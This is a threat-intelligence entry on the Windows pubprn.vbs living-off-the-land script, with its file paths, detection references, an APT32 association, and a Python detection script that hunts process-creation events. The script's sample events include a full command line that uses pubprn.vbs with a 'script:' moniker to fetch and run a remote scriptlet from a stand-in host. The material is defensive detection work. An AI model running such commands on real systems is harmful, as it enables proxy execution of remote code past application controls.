Pubprn (58883c83-d5be-42fc-b4bd-9287e55cd499)

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Proxy execution with Pubprn.vbs

Author: Oddvar Moe

Paths:

* C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
* C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs

Resources:

* https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/
* https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
* https://github.com/enigma0x3/windows-operating-system-archaeology

Detection:

* BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
* Sigma: proc_creation_win_lolbin_pubprn.yml

Source: Pubprn.vbs - LOLBAS Project
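As an added example (not part of the LOLBAS entry, the Sigma rule it cites, or the MISP galaxy), the following Python reproduces the process-creation check a detection such as proc_creation_win_lolbin_pubprn.yml would perform: a Windows script host launching pubprn.vbs with a `script:` moniker as its second argument, rather than the LDAP container path that legitimate printer publishing passes. The exact fields and keying of the real Sigma rule are assumptions here; the Sysmon-style event records are constructed, not captured from any system.

```python
"""
Hunt Sysmon Event ID 1 style records for proxy execution via pubprn.vbs.

Editor-added example, not code from the LOLBAS project or the Sigma rule.
Assumption: the rule keys on cscript/wscript running pubprn.vbs with a
'script:' moniker on the command line. All events below are constructed.
"""
import re
from typing import Dict, Iterable, List, Optional

# Both copies listed on the LOLBAS page, compared case-insensitively.
PUBPRN_PATHS = (
    r"c:\windows\system32\printing_admin_scripts\en-us\pubprn.vbs",
    r"c:\windows\syswow64\printing_admin_scripts\en-us\pubprn.vbs",
)

SCRIPT_HOSTS = ("cscript.exe", "wscript.exe")

# 'script:' moniker (not preceded by a letter, so 'cscript.exe' never matches).
# This moniker is what makes pubprn.vbs fetch and run scriptlet content
# instead of treating the argument as an LDAP path.
MONIKER_RE = re.compile(r"(?<![A-Za-z])script:(\S+)", re.IGNORECASE)


def analyze(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return match details for a suspicious pubprn.vbs launch, else None."""
    image = event.get("Image", "").lower()
    cmdline = event.get("CommandLine", "")
    if not image.endswith(SCRIPT_HOSTS):
        return None
    if "pubprn.vbs" not in cmdline.lower():
        return None
    moniker = MONIKER_RE.search(cmdline)
    if not moniker:
        # Normal administrative use passes an LDAP://... container path.
        return None
    return {
        "host": image.rsplit("\\", 1)[-1],
        "moniker": moniker.group(1).strip('"'),
        # False means the script was copied out of its shipped location,
        # which is worth flagging separately from the moniker itself.
        "in_known_path": any(p in cmdline.lower() for p in PUBPRN_PATHS),
        "parent": event.get("ParentImage", ""),
    }


def hunt(events: Iterable[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run analyze() over a stream of process-creation events."""
    return [hit for hit in map(analyze, events) if hit is not None]


# Constructed sample events (hypothetical hosts and paths, not real telemetry).
SAMPLE_EVENTS = [
    # Proxy execution: scriptlet pulled from a remote host via the moniker.
    {"Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://example.invalid/payload.sct'},
    # Same moniker, but pubprn.vbs copied out of its normal directory.
    {"Image": r"C:\Windows\SysWOW64\cscript.exe",
     "ParentImage": r"C:\Users\Public\run.exe",
     "CommandLine": r'cscript.exe //nologo C:\Users\Public\pubprn.vbs localhost script:C:\Users\Public\p.sct'},
    # Legitimate use: printer published to an AD container by LDAP path.
    {"Image": r"C:\Windows\System32\cscript.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cscript.exe C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs printsrv01 "LDAP://CN=Printers,DC=corp,DC=example"'},
    # Unrelated script host activity.
    {"Image": r"C:\Windows\System32\cscript.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"cscript.exe C:\Windows\System32\slmgr.vbs /dlv"},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

Only the two moniker launches are reported; the LDAP publish and the slmgr.vbs run fall through. Keying on the script host image rather than on `pubprn.vbs` alone keeps the logic aligned with how the binary is actually executed (double-clicking or shell-executing the .vbs still spawns wscript.exe), and the `in_known_path` flag separates an in-place abuse from a relocated copy, which an analyst would triage differently.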

| Cluster A | Galaxy A | Cluster B | Galaxy B | Level |
|---|---|---|---|---|
| APT32 (c0fe9859-e8de-4ce1-bc3c-b489e914a145) | Tidal Groups | Pubprn (58883c83-d5be-42fc-b4bd-9287e55cd499) | Tidal Software | 1 |